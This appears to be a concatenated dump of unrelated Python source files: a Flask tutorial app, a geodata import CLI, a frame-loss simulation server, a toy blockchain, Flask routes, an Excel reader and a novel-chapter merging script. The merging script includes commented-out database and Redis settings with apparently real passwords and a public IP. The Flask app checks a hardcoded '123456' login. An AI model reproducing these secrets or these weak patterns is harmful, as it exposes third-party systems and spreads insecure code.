content='世间不会亏待每个有心人', author_id=1)\n # db.session.add(article_res)\n # db.session.add(article_result)\n # db.session.commit()\n\n # 通过article来获取作者\n # article_res = Article.query.filter(Article.title == '活着').first()\n # print(article_res.author.username)\n\n # 通过author 来查找用户所有的文章\n # author_result = Author.query.filter(Author.username == '周勇利').first()\n # articles = author_result.articles\n\n # for art in articles:\n # print('-'*10)\n # print(art.title)\n\n # 多对多关系对象新增\n # tag1 = Tag(name='生活')\n # tag2 = Tag(name='情感')\n #\n # db.session.add(tag1)\n # db.session.add(tag2)\n #\n # article_res = Article.query.filter(Article.title == '活着').first()\n # article_res.tags.append(tag1)\n # article_res.tags.append(tag2)\n #\n # db.session.commit()\n\n # 多对多关系查找\n if hasattr(g, 'username'):\n article_result = Article.query.filter(Article.title == '活着').first()\n tags = article_result.tags\n for t in tags:\n print('*' * 10)\n print(t.name)\n # session 设置,flask框架的session是经过加密后返回给浏览器保存在cookie中\n # session['tag'] = '生活和情感'\n return 'hello world!'\n else:\n return redirect(url_for('login'))\n\n\n@app.route('/get/')\ndef get():\n # session 获取\n tag = session.get('tag')\n print(tag)\n # session 删除\n if tag:\n print('key->tag存在')\n session.pop('tag')\n else:\n print('key->tag不存在')\n\n print(session.get('tag'))\n return 'success'\n\n\n@app.route('/article/')\ndef article(id):\n return u'你传入的参数是:%s' % id\n\n\n@app.route('/list/')\ndef my_list():\n return\n\n\n@app.route('/question/')\ndef question(is_login):\n if is_login == '1':\n return u'这是发布问答页面'\n else:\n return redirect(url_for('login'))\n\n\n# methods 参数设置post和get访问类型 ,默认只支持get访问\n# get 可以使用request.args.get('')获取参数\n# post 可以使用request.form.get('')获取参数\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n\n if request.method == 'GET':\n q = request.args.get('q')\n print('get的请求参数:', q)\n return render_template('login.html')\n else:\n username = request.form.get('username')\n password = request.form.get('password')\n\n if username == '123456' and password == '123456':\n # # g 
是flask框架的全局变量,在一次请求中全局有效,请求结束后g就会失效\n # g.username = username\n # g.password = password\n # # 使用来全局变量g的方法,必须在同一次调用中使用,调用完成就回被释放掉\n # login_log()\n\n # 用来验证钩子函数 before_request\n session['username'] = username\n return redirect(url_for('hello_world'))\n else:\n return u'用户名密码错误'\n\n\n@app.route('/index/')\ndef index():\n class Person(object):\n name = u'周勇利'\n age = 29\n\n p = Person()\n\n context = {\n 'username': u'周勇利',\n 'sex': u'男',\n 'age': 29,\n 'person': p,\n 'websites': {\n 'baidu': 'www.baidu.com',\n 'google': 'www.google.com'\n }\n }\n return render_template('index.html', **context)\n\n\n@app.route('/answer/')\ndef answer(id):\n user = {\n 'name': u'周勇利',\n 'age': 29\n }\n if id == '1':\n return render_template('answer.html', user=user)\n else:\n return render_template('answer.html')\n\n\n@app.route('/for/')\ndef my_for():\n user = {\n 'username': u'周勇利',\n 'age': 29\n }\n\n websites = ['www.baidu.com', 'www.google.com']\n\n books = [\n {\n 'name': '西游记',\n 'author': '吴承恩',\n 'price': 120\n },\n {\n 'name': '红楼梦',\n 'author': '曹雪芹',\n 'price': 123\n },\n {\n 'name': '三国演义',\n 'author': '罗贯中',\n 'price': 124\n },\n {\n 'name': '水浒传',\n 'author': '施耐庵',\n 'price': 125\n }\n ]\n\n avatar = ''\n\n contents = [\n {\n 'name': '周勇利',\n 'text': '评论内容'\n },\n {\n 'name': '周劭洋',\n 'text': '评论内容2'\n }\n ]\n\n return render_template('for.html', user=user, websites=websites, books=books, contents=contents)\n\n\n@app.route('/extend_block/')\ndef extend_block():\n return render_template('extendblock.html')\n\n\n@app.before_request\ndef my_before_request():\n # 在所有的视图函数之前执行\n # 可以做一些登陆之前的验证,判断用户是否已经登陆,不能在钩子函数中直接使用redirect,会导致重复的重定向\n username = session.get('username')\n if username:\n g.username = username\n\n\n@app.context_processor\ndef my_context_processor():\n # 上下文处理程序,可以设置字典,字典的key值会被模版当作变量来处理,\n # 作用是多个模版有共同的变量时可以在上下文处理程序中设置\n return {'username': '周勇利'}\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"194218717","text":"\"\"\"Landshark importing commands.\"\"\"\n\nimport logging\nimport os.path\nfrom glob import glob\nfrom multiprocessing import cpu_count\n\nimport tables\nimport click\nfrom typing import List, Optional\n\nfrom landshark.tifread import shared_image_spec, OrdinalStackSource, \\\n CategoricalStackSource\nfrom landshark.featurewrite import write_imagespec, write_ordinal, \\\n write_categorical, write_coordinates\nfrom landshark.shpread import OrdinalShpArraySource, \\\n CategoricalShpArraySource, CoordinateShpArraySource\nfrom landshark.scripts.logger import configure_logging\nfrom landshark.hread import read_image_spec, \\\n CategoricalH5ArraySource, OrdinalH5ArraySource\nfrom landshark.trainingdata import write_trainingdata, write_querydata\nfrom landshark.metadata import from_files, write_metadata\nfrom landshark.normalise import get_stats\nfrom landshark.category import get_maps\nfrom landshark.trainingdata import setup_training\n\nlog = logging.getLogger(__name__)\n\n\n# SOME USEFUL PREPROCESSING COMMANDS\n# ----------------------------------\n# gdal_translate -co \"COMPRESS=NONE\" src dest\n\n\n@click.group()\n@click.option(\"-v\", \"--verbosity\",\n type=click.Choice([\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\"]),\n default=\"INFO\", help=\"Level of logging\")\ndef cli(verbosity: str) -> int:\n \"\"\"Parse the command line arguments.\"\"\"\n configure_logging(verbosity)\n return 0\n\n\ndef _tifnames(directories: Optional[str]) -> List[str]:\n names: List[str] = []\n if directories is None:\n return names\n for d in directories:\n file_types = (\"tif\", \"gtif\")\n for t in file_types:\n glob_pattern = os.path.join(d, \"**\", \"*.{}\".format(t))\n names.extend(glob(glob_pattern, recursive=True))\n return names\n\n\n@cli.command()\n@click.option(\"--batchsize\", type=int, default=100)\n@click.option(\"--categorical\", type=click.Path(exists=True), multiple=True)\n@click.option(\"--ordinal\", type=click.Path(exists=True), multiple=True)\n@click.option(\"--nonormalise\", is_flag=True)\n@click.option(\"--name\", type=str, required=True,\n help=\"Name of output file\")\n@click.option(\"--nworkers\", type=int, default=cpu_count())\n@click.option(\"--ignore-crs/--no-ignore-crs\", is_flag=True, default=False)\ndef tifs(categorical: str, ordinal: str, nonormalise: bool,\n name: str, nworkers: int, batchsize: int, ignore_crs: bool) -> int:\n \"\"\"Build a tif stack from a set of input files.\"\"\"\n normalise = not nonormalise\n log.info(\"Using {} worker processes\".format(nworkers))\n out_filename = os.path.join(os.getcwd(), name + \"_features.hdf5\")\n ord_filenames = _tifnames(ordinal) if ordinal else []\n cat_filenames = _tifnames(categorical) if categorical else []\n all_filenames = ord_filenames + cat_filenames\n spec = shared_image_spec(all_filenames, ignore_crs)\n\n with tables.open_file(out_filename, mode=\"w\", title=name) as outfile:\n write_imagespec(spec, outfile)\n\n if ordinal:\n ord_source = OrdinalStackSource(spec, ord_filenames)\n log.info(\"Ordinal missing value is {}\".format(ord_source.missing))\n if normalise:\n stats = get_stats(ord_source, batchsize)\n zvar = stats[1] == 0.0\n if any(zvar):\n zsrcs = [c for z, c in zip(zvar, ord_source.columns) if z]\n msg = 'The following sources have zero variance: {}'\n raise ValueError(msg.format(zsrcs))\n else:\n stats = None\n\n log.info(\"Writing normalised ordinal data to output file\")\n write_ordinal(ord_source, outfile, nworkers, batchsize, stats)\n\n if categorical:\n cat_source = 
CategoricalStackSource(spec, cat_filenames)\n log.info(\"Categorical missing value is {}\".format(\n cat_source.missing))\n maps = get_maps(cat_source, batchsize)\n log.info(\"Writing mapped categorical data to output file\")\n write_categorical(cat_source, outfile, nworkers, batchsize, maps)\n\n log.info(\"GTiff import complete\")\n\n return 0\n\n\n@cli.command()\n@click.argument(\"targets\", type=str, nargs=-1)\n@click.option(\"--shapefile\", type=click.Path(exists=True), required=True)\n@click.option(\"--batchsize\", type=int, default=100)\n@click.option(\"--name\", type=str, required=True)\n@click.option(\"--every\", type=int, default=1)\n@click.option(\"--categorical\", is_flag=True)\n@click.option(\"--normalise\", is_flag=True)\n@click.option(\"--random_seed\", type=int, default=666)\ndef targets(shapefile: str, batchsize: int, targets: List[str], name: str,\n every: int, categorical: bool, normalise: bool, random_seed: int) \\\n -> int:\n \"\"\"Build target file from shapefile.\"\"\"\n log.info(\"Loading shapefile targets\")\n out_filename = os.path.join(os.getcwd(), name + \"_targets.hdf5\")\n nworkers = 0 # shapefile reading breaks with concurrency\n\n with tables.open_file(out_filename, mode=\"w\", title=name) as h5file:\n coord_src = CoordinateShpArraySource(shapefile, random_seed)\n write_coordinates(coord_src, h5file, batchsize)\n\n if categorical:\n cat_source = CategoricalShpArraySource(\n shapefile, targets, random_seed)\n maps = get_maps(cat_source, batchsize)\n write_categorical(cat_source, h5file, nworkers, batchsize, maps)\n else:\n ord_source = OrdinalShpArraySource(shapefile, targets, random_seed)\n stats = get_stats(ord_source, batchsize) \\\n if normalise else None\n write_ordinal(ord_source, h5file, nworkers, batchsize, stats)\n\n log.info(\"Target import complete\")\n\n return 0\n\n\n@cli.command()\n@click.argument(\"features\", type=click.Path(exists=True))\n@click.argument(\"targets\", type=click.Path(exists=True))\n@click.option(\"--folds\", type=click.IntRange(2, None), default=10)\n@click.option(\"--testfold\", type=click.IntRange(1, None), default=1)\n@click.option(\"--halfwidth\", type=click.IntRange(0, None), default=1)\n@click.option(\"--nworkers\", type=click.IntRange(0, None), default=cpu_count())\n@click.option(\"--batchsize\", type=click.IntRange(1, None), default=100)\n@click.option(\"--random_seed\", type=int, default=666)\ndef trainingdata(features: str, targets: str, testfold: int,\n folds: int, halfwidth: int, batchsize: int, nworkers: int,\n random_seed: int) -> int:\n \"\"\"Get training data.\"\"\"\n\n tinfo = setup_training(features, targets, folds, random_seed, halfwidth)\n n_train = len(tinfo.target_src) - tinfo.folds.counts[testfold]\n directory = os.path.join(os.getcwd(), tinfo.name +\n \"_traintest{}of{}\".format(testfold, folds))\n metadata = from_files(features, targets, tinfo.image_spec,\n halfwidth, n_train, folds, testfold)\n write_trainingdata(tinfo, directory, testfold, batchsize, nworkers)\n write_metadata(directory, metadata)\n log.info(\"Training import complete\")\n return 0\n\n\n@cli.command()\n@click.option(\"--features\", type=click.Path(exists=True), required=True)\n@click.option(\"--batchsize\", type=int, default=1)\n@click.option(\"--nworkers\", type=int, default=cpu_count())\n@click.option(\"--halfwidth\", type=int, default=1)\n@click.argument(\"strip\", type=int)\n@click.argument(\"totalstrips\", type=int)\ndef querydata(features: str, batchsize: int, nworkers: int,\n halfwidth: int, strip: int, totalstrips: int) -> 
int:\n \"\"\"Grab a chunk for prediction.\"\"\"\n log.info(\"Using {} worker processes\".format(nworkers))\n\n dirname = os.path.basename(features).rsplit(\".\")[0] + \\\n \"_query{}of{}\".format(strip, totalstrips)\n directory = os.path.join(os.getcwd(), dirname)\n try:\n os.makedirs(directory)\n except FileExistsError:\n pass\n\n image_spec = read_image_spec(features)\n tag = \"query.{}of{}\".format(strip, totalstrips)\n write_querydata(features, image_spec, strip, totalstrips,\n batchsize, halfwidth, nworkers, directory, tag)\n log.info(\"Query import complete\")\n return 0\n","sub_path":"landshark/scripts/importers.py","file_name":"importers.py","file_ext":"py","file_size_in_byte":8073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"525669662","text":"# 服务端\nimport random\nfrom socket import *\nimport time\n\nACK_0 = '0'\nACK_1 = '1'\nNAK = '-1'\nTIMEOUT_1 = '2' # 确认帧未及时返回\nTIMEOUT_2 = '3' # 数据帧丢失\n\n\ndef receive(conn, addr):\n NowFlag = -1\n BeforeFlag = -1\n ReceiveMessageList = []\n CanAddFlag = True # 一次发送多次重复帧能否添加\n while True:\n index = random.sample(range(0, 4), 1)\n try:\n data = conn.recv(BUFSIZ) # 读取已链接客户的发送的消息\n time.sleep(0.1)\n except Exception:\n print(\"断开的客户端\", addr)\n break\n receiveStr = data.decode(COD)\n if not receiveStr:\n break\n NowFlag = int(receiveStr[0])\n messege = receiveStr[2:]\n if index[0] == 0: # 确认帧未及时返回\n print(\"(ReceivedMessage:%s,Order:%d),确认帧未及时返回\" % (messege, NowFlag))\n BeforeFlag = NowFlag\n if CanAddFlag:\n ReceiveMessageList.append(messege)\n CanAddFlag = False\n time.sleep(0.2000001)\n elif index[0] == 1: # 数据帧丢失\n print(\"数据帧丢失\")\n time.sleep(0.2000001)\n elif index[0] == 2:\n print(\"接收到错误帧\")\n conn.send(NAK.encode(COD)) # 错误\n else: # 正确接收\n CanAddFlag = True\n if BeforeFlag == NowFlag:\n print(\"(ReceivedMessage:%s,Order:%d),重复帧\" % (messege, NowFlag))\n else:\n BeforeFlag = NowFlag\n ReceiveMessageList.append(messege)\n print(\"(ReceivedMessage:%s,Order:%d),正确接收\" % (messege, NowFlag))\n if len(ReceiveMessageList) != 0:\n for value in ReceiveMessageList:\n print(value, end=\" \")\n print()\n if NowFlag == 0:\n conn.send(ACK_1.encode(COD)) # 0号帧收到,想收1号帧\n else:\n conn.send(ACK_0.encode(COD)) # 1号帧收到,想收0号帧\n conn.close() # 关闭客户端链接\n\n\nif __name__ == '__main__':\n COD = 'utf-8'\n HOST = '' # 主机ip\n PORT = 21566 # 软件端口号\n BUFSIZ = 1024\n ADDR = (HOST, PORT)\n SIZE = 10\n tcpS = socket(AF_INET, SOCK_STREAM) # 创建socket对象\n tcpS.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # 加入socket配置,重用ip和端口\n tcpS.bind(ADDR) # 绑定ip端口号\n tcpS.listen(SIZE) # 设置最大链接数\n while True:\n # if len(ReceiveMessageList)!=0:\n # for value in ReceiveMessageList:\n # print(value,end=\"\")\n # print()\n print(\"服务器启动,监听客户端链接\")\n conn, addr = tcpS.accept()\n print(\"链接的客户端\", addr)\n receive(conn, addr)\n tcpS.closel()\n","sub_path":"test2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"44655067","text":"import hashlib as hasher\nimport datetime as date\n\n# Source: https://gist.github.com/aunyks/8f2c2fd51cc17f342737917e1c2582e2\n\n# Define what a Snakecoin block is\nclass Block:\n def __init__(self, index, timestamp, data, previous_hash):\n self.index = index\n self.timestamp = timestamp\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.hash_block()\n \n def hash_block(self):\n sha = hasher.sha256()\n sha.update(str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash))\n return sha.hexdigest()\n\n# Generate genesis block\ndef create_genesis_block():\n # Manually construct a block with\n # index zero and arbitrary previous hash\n return Block(0, date.datetime.now(), \"Genesis Block\", \"0\")\n\n# Generate all later blocks in the blockchain\ndef next_block(last_block, cat_image_pixels_data):\n this_index = last_block.index + 1\n this_timestamp = date.datetime.now()\n this_data = cat_image_pixels_data\n this_hash = last_block.hash\n return Block(this_index, this_timestamp, this_data, this_hash)","sub_path":"snakecoin.py","file_name":"snakecoin.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"160057807","text":"from flask import render_template, jsonify, flash, redirect, url_for\nfrom flask_login import login_required, current_user\n\nfrom app import app\nfrom app.plugins.general_helper import user_accept_onboarding\n\n\n@app.route('/', methods=['GET'])\n@login_required\ndef index():\n return render_template('home.html')\n\n\n@app.route('/check-welcome', methods=['POST'])\n@login_required\ndef check_welcome(jsonified=True):\n persona = current_user.to_dict()['data']\n if persona['accepted_onboarding']:\n incomplete = False\n else:\n incomplete = True\n outstanding = sum([step['open'] for step in persona['startup_steps']])\n data = {\n 'html': render_template('welcome.html', persona=persona,\n outstanding=outstanding),\n 'incomplete': incomplete,\n 'outstanding': outstanding\n }\n if jsonified:\n return jsonify(data)\n else:\n return data\n\n\n@app.route('//accept-onboarding', methods=['GET'])\n@login_required\ndef accept_onboarding(user_id):\n if current_user.id == user_id and not check_welcome(jsonified=False)['outstanding']:\n user_accept_onboarding(current_user)\n flash(\"You're all set!\")\n return redirect(url_for('index'))\n","sub_path":"app/ui/application_routes.py","file_name":"application_routes.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"633764984","text":"# encoding=utf-8\n# @Author :Alan\n# @Time : 2019/12/4 10:30\n# @File : readconfig.PY\nimport xlrd\n\nclass readexcel(object):\n\tdef __init__(self,file_name):\n\t\t#self.file_name=file_name\n\t\tself.xl = xlrd.open_workbook(file_name)\n\tdef read(self):\n\t\tself.table = self.xl.sheet_by_name('login')\n\t\tself.row = self.table.row_values(1)\n\t\tfor i in range(len(self.row)):\n\t\t\tif isinstance(self.row[i],float):\n\t\t\t\tself.row[i]=str(int(self.row[i]))\n\t\treturn self.row\n\nif __name__==\"__main__\":\n\texcel = readexcel('config.xlsx')\n\texcel.read()","sub_path":"readconfig.py","file_name":"readconfig.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"594435609","text":"\"\"\"\n 合并小说的内容\n\"\"\"\nimport pymysql.cursors\nimport redis\nimport hashlib\nimport shutil\nimport os\nimport json\nimport time\nimport difflib\nimport sys\n\n\n# DB_HOST = '127.0.0.1'\n# DB_USER = 'novelcode'\n# DB_PWD = 'RvZ@7^yGR2waQNLJ'\n# DB_NAME = 'novel_collect'\n# DB_CHARSET = 'utf8'\n# DB_PORT = 3306\n#\n#\n# redis_config = {\n# \"host\": \"221.195.1.100\",\n# \"port\": 26890,\n# \"db\": 4,\n# \"password\": 'plOTrEdLUnFGYJzo',\n# }\n\n\nDB_HOST = '127.0.0.1'\nDB_USER = 'root'\nDB_PWD = 'root'\nDB_NAME = 'novel_collect'\nDB_CHARSET = 'utf8'\nDB_PORT = 3306\n# redis\n\nredis_config = {\n \"host\": \"127.0.0.1\",\n \"port\": 6379,\n \"db\": 4,\n \"password\": '',\n}\n\n\n\nFILE_BASE = \"/data1/book/\"\n\nclass novelMarge(object):\n\n def __init__(self):\n self.mysql = pymysql.Connect(\n host = DB_HOST,\n user = DB_USER,\n passwd= DB_PWD,\n port = DB_PORT,\n db = DB_NAME,\n charset=DB_CHARSET\n )\n\n self.redis_pool = redis.ConnectionPool(**redis_config)\n self.sredis = redis.Redis(connection_pool=self.redis_pool)\n def main(self):\n # 第四步 把多个章节内容合并成list.json 格式\n self.get_update_novel_gather()\n\n\n #第三步 合并出新的书籍 创建新书籍\n #self.add_new_novels()\n # 第二部要合并数据缓存\n #self.get_novel_neaten()\n # 第一步 项目执行次数\n #self.novel_neaten()\n\n \"\"\"\n 获取所有的来源 地址数据 进行书籍匹配和合并 匹配到 90 以上\n \"\"\"\n def get_update_novel_gather(self):\n lists=[]\n adbb = {}\n adbb['name'] = 1\n adbb['sex'] = 2\n\n lists.append(adbb)\n cc = {}\n cc['name'] = 2\n cc['sex'] = 4\n cc['wixiaowen'] = 4\n\n lists.append(cc)\n print(lists)\n exit()\n # if self.sredis.get(\"update_novel\"):\n # print(\"程序在进行中。请等待。。。\")\n # exit()\n # else:\n # self.sredis.set(\"update_novel\", 1)\n lg = 0\n page_index = 0\n limit = 100\n cursor = self.mysql.cursor()\n #try:\n while lg == 0:\n page = page_index * limit\n sql = \"select * from novel_novels_gather where new_novels_id>0 order by weight desc limit %d,%d\" % (page, limit)\n cursor.execute(sql)\n novels_list = cursor.fetchall()\n lencut = len(novels_list)\n page_index += 1\n\n if lencut == 0:\n lg = 1\n cursor.close()\n print(\"全部更新完成\")\n exit()\n else:\n\n if novels_list:\n for index,valss in enumerate(novels_list):\n #获取的所有的相关的章节的最近更新的数量\n novel_chapters_sql = \"select novels_id,count from novel_chapters where novels_id IN(%s)\" %(valss[4])\n cursor.execute(novel_chapters_sql)\n novel_chapters = cursor.fetchall()\n novel_chapters_list = {}\n for vals in novel_chapters:\n novel_chapters_list[vals[0]] = vals[1]\n\n #在获取的当前更新的长度\n novel_novels_neaten_sql = \"select novels_id,source_id,count from novel_novels_neaten where novels_id IN(%s)\" %(valss[4])\n cursor.execute(novel_novels_neaten_sql)\n novel_novels_neaten = cursor.fetchall()\n\n # 获取的合并的书籍所有的章节内容\n newsPath = \"%s%s/%s/chapter.json\" % (FILE_BASE, 35, valss[1])\n\n #合并的小说的书籍ID\n mage_novel_id = valss[1]\n with open(newsPath,'r') as f:\n mage_chapters_list = f.read()\n mage_chapters_list = json.loads(mage_chapters_list)\n #合并最新书籍章节数量\n mage_chapters_number = len(mage_chapters_list)\n novel_chapters_info = {}\n for index,neaten_vl in enumerate(novel_novels_neaten):\n novel_chapters_info[neaten_vl[0]] = neaten_vl[1]\n\n #来源 数据优先处理\n update_chapters_number = novel_chapters_list[valss[6]]\n\n if update_chapters_number > mage_chapters_number:\n form_path_list = \"%s%s/%s/chapter.json\" % (FILE_BASE, novel_chapters_info[valss[6]], valss[6])\n form_recs = os.path.exists(form_path_list)\n #判断的文件是否存在\n\n if form_recs == False:\n print(\"书籍ID\", valss[6], \"没有内容\")\n continue\n\n with open(form_path_list, 
'r') as form_path_f:\n form_path_chapters_list = form_path_f.read()\n if form_path_chapters_list:\n form_path_chapters_list = json.loads(form_path_chapters_list)\n else:\n continue\n\n if form_path_chapters_list[mage_chapters_number::]:\n chapter_id = mage_chapters_number\n for index,vs in enumerate(form_path_chapters_list[mage_chapters_number::]):\n chapter_id +=1\n chapters_list_data = {}\n chapters_list_ads = {}\n # 更新的新的章节\n chapters_list_data['source_id'] = novel_chapters_info[valss[6]]\n chapters_list_data['url'] = vs['url']\n chapters_list_data['add_time'] = vs['add_time']\n\n chapters_list_ads['_id'] = chapter_id\n chapters_list_ads['name'] = vs['name']\n chapters_list_ads['add_time'] = vs['add_time']\n self.add_novel_chapter_list(valss[1], chapter_id, chapters_list_data)\n mage_chapters_list.append(chapters_list_ads)\n\n with open(newsPath, 'w') as f:\n f.write(json.dumps(mage_chapters_list,ensure_ascii=False))\n\n for neaten_value in novel_novels_neaten:\n\n form_source_id = neaten_value[1]\n form_name_msg = \"来源的站点ID%s书籍ID:%s\" % (form_source_id,neaten_value[0])\n\n #章节的那边的数据更新的章节\n update_chapters_number = novel_chapters_list.get(neaten_value[0])\n\n if update_chapters_number == None:\n continue\n\n #当前的合并的书籍 更新的章节的数量\n chapters_number = neaten_value[2]\n # 比较的一下的书籍\n if update_chapters_number > chapters_number:\n formPath = \"%s%s/%s/chapter.json\" % (FILE_BASE, form_source_id, neaten_value[0])\n form_path_recss = os.path.exists(formPath)\n if form_path_recss == False:\n print(\"书籍\",neaten_value[0],\"没有数据\")\n continue\n\n with open(formPath, 'r') as ff:\n form_chapters_List = ff.read()\n\n if form_chapters_List:\n form_chapters_List = json.loads(form_chapters_List)\n form_chapters_limit = form_chapters_List[chapters_number::]\n form_chapters_count = len(form_chapters_List)\n form_chapters_List = {}\n #新网站网站章节列表\n for index,mage_vals in enumerate(mage_chapters_list):\n\n minnumber = int(index-5)\n maxnumber = int(index+6)\n # 原网站的章节列表\n for index,form_valus in enumerate(form_chapters_limit[minnumber:maxnumber]):\n rate = 0\n if mage_vals.get('name') and form_valus.get('name'):\n rate = difflib.SequenceMatcher(None, mage_vals['name'],form_valus['name']).quick_ratio()\n rate = int(round(rate,2) * 100)\n if rate > 95:\n form_chapters_file_list = {}\n #合并之后的数据\n mage_chapters_list_file_path = \"%s%s/%s/%d/list.json\" % (FILE_BASE, 35,mage_novel_id,mage_vals['_id'])\n mage_chapters_path_recss = os.path.exists(mage_chapters_list_file_path)\n\n if mage_chapters_path_recss == False:\n print(\"真的来这里了\")\n continue\n\n with open(mage_chapters_list_file_path,\"r\") as mage_chapters_f:\n mage_chapters_file_list = mage_chapters_f.read()\n mage_chapters_file_list = json.loads(mage_chapters_file_list)\n\n #检查来源的是否存在的了\n is_status = 0\n for vs in mage_chapters_file_list:\n if vs['source_id'] == form_source_id:\n is_status = 1\n\n if is_status == 0:\n #来源的站点的数据整合\n form_chapters_file_list['source_id'] = form_source_id\n form_chapters_file_list['url'] = form_valus['url']\n form_chapters_file_list['add_time'] = form_valus['add_time']\n mage_chapters_file_list.append(form_chapters_file_list)\n #添加的数据\n mage_chapters_file_list = json.dumps(mage_chapters_file_list,ensure_ascii=False)\n with open(mage_chapters_list_file_path, \"w\") as mage_chapters_f:\n mage_chapters_f.write(mage_chapters_file_list)\n print(\"原站点\",form_source_id,'更新至35',\"原书籍ID:\",neaten_value[0],\"更新的至书籍ID:\",mage_novel_id,\"更新的章节:\",mage_vals['_id'])\n # 更新的当前的书籍更新的总数\n\n else:\n print(form_name_msg, \"章节的已经更新到最新\")\n\n 
update_novel_novels_neaten_sql = \"update novel_novels_neaten set count=%s where novels_id=%s\" % (form_chapters_count, neaten_value[0])\n cursor.execute(update_novel_novels_neaten_sql)\n self.mysql.commit()\n else:\n print(form_name_msg,\"暂无新的章节的更新信息\")\n\n else:\n print(\"暂无更新\")\n # except Exception as e:\n # print(e)\n # exit()\n # self.sredis.delete(\"update_novel\")\n # self.sredis.delete(\"update_novel\")\n\n\n \"\"\"\n 合并新书必须拷贝章节内容\n \"\"\"\n def add_new_novels(self):\n if self.sredis.get(\"add_new_novels\"):\n print(\"程序在进行中。请等待。。。\")\n exit()\n else:\n self.sredis.set(\"add_new_novels\", 1)\n\n lg = 0\n page_index = 0\n limit = 1000\n cursor = self.mysql.cursor()\n try:\n while lg == 0:\n page = page_index * limit\n sql = \"select id,novels_ids from `novel_novels_gather` where new_novels_id =0 ORDER BY weight asc limit %d,%d\" % (page, limit)\n\n cursor.execute(sql)\n novels_ids = cursor.fetchall()\n lencut = len(novels_ids)\n\n if lencut == 0:\n lg = 1\n cursor.close()\n else:\n if novels_ids:\n for val in novels_ids:\n\n #获取小说的第一个站点\n novel_id_sql = \"select novels_id from novel_novels_neaten where source_id in(3,1,82,15,4) and novels_id in(%s)\" %(val[1])\n cursor.execute(novel_id_sql)\n novels_ids = cursor.fetchone()\n if novels_ids == None:\n recs = val[1].split(',')\n novels_ids = recs[0]\n else:\n novels_ids = novels_ids[0]\n\n novels_ids = int(novels_ids)\n print(\"分析原小说ID\",novels_ids)\n novel_novels_sql = \"select * from novel_novels where id=%d \" %(novels_ids)\n cursor.execute(novel_novels_sql)\n novels_info = cursor.fetchone()\n\n\n if novels_info:\n name_author_que_str = \"%s$c%s\" %(novels_info[1],novels_info[6])\n name_author_que = hashlib.md5(name_author_que_str.encode()).hexdigest()\n #查看是否填写过新书\n restar_sql = \"select id from novel_novels where name_author_que='%s'\" %(name_author_que)\n \n cursor.execute(restar_sql)\n recs = cursor.fetchone()\n if recs == None:\n \n fromPath = \"%s%s/%s/chapter.json\" % (FILE_BASE, novels_info[16], novels_info[0])\n\n if os.path.isfile(fromPath) == False:\n print(\"没有目录\")\n else:\n \n with open(fromPath, 'r') as f:\n flist = f.read()\n if flist:\n print(\"新版分析\")\n chapter_list = json.loads(flist)\n\n else:\n chapter_list = \"\"\n print(\"目录没有内容\")\n if chapter_list:\n\n #添加的新书\n instr = 'insert into novel_novels (name,url,corver_url,corver_path,info,author,weight,read_num,word_num,is_action,has_content,gender,add_time,update_time,types_id,source_id,is_show,name_author_que,form_novels_id) VALUES'\n instr += '(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'\n cursor.execute(instr,args= (novels_info[1],novels_info[2],novels_info[3],novels_info[4],novels_info[5],novels_info[6],novels_info[7],novels_info[8],novels_info[9],novels_info[10],novels_info[11],novels_info[12],novels_info[13],novels_info[14],novels_info[15],35,novels_info[17],name_author_que,novels_info[0]))\n self.mysql.commit()\n new_novel_id = cursor.lastrowid\n else:\n new_novel_id = False\n if new_novel_id:\n\n newsPath = \"%s%s/%s/\" % (FILE_BASE, 35,new_novel_id)\n newsFilePath = newsPath+\"chapter.json\"\n novel_chapters_path = \"%s/%s/%s\" %(35,new_novel_id,\"chapter.json\")\n #TODO 添加novel_chapters 表数\n #判断文件是否存在\n is_file_path = os.path.isfile(fromPath)\n if is_file_path == True:\n os.makedirs(newsPath)\n\n #json.dumps()\n new_chapter = []\n if chapter_list:\n for chapter in chapter_list:\n new_chapters = {}\n chapters_list_data = {}\n new_chapters['_id'] = chapter['_id']\n new_chapters['name'] = chapter['name']\n new_chapters['add_time'] = 
chapter['add_time']\n chapters_list_data['source_id'] = novels_info[16]\n chapters_list_data['url'] = chapter['url']\n chapters_list_data['add_time'] = chapter['add_time']\n self.add_novel_chapter_list(new_novel_id, chapter['_id'],chapters_list_data)\n new_chapter.append(new_chapters)\n #最新章节\n new_chapter_name = new_chapters['name']\n\n upcount = len(new_chapter)\n\n with open(newsFilePath, 'w') as f:\n f.write(json.dumps(new_chapter,ensure_ascii=False))\n #修改合并表信息\n update_sql = \"update novel_novels_gather set new_novels_id=%d,form_novels_id=%d where id=%d\" %(new_novel_id,novels_info[0],val[0])\n cursor.execute(update_sql)\n neaten_update_sql = \"update novel_novels_neaten set count=%d where novels_id=%d\" %(upcount,novels_info[0])\n cursor.execute(neaten_update_sql)\n self.mysql.commit()\n #添加的更新的最新章节的信息\n add_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n insert_sql = 'insert into novel_chapters (new_name,path,novels_id,update_time,add_time,count,is_sync) VALUES (\"%s\",\"%s\",%d,\"%s\",\"%s\",%d,1)' %(new_chapter_name,novel_chapters_path,new_novel_id,add_time,add_time,upcount)\n cursor.execute(insert_sql)\n self.mysql.commit()\n else:\n print(\"暂无数据\")\n print(\"生成成功\")\n else:\n 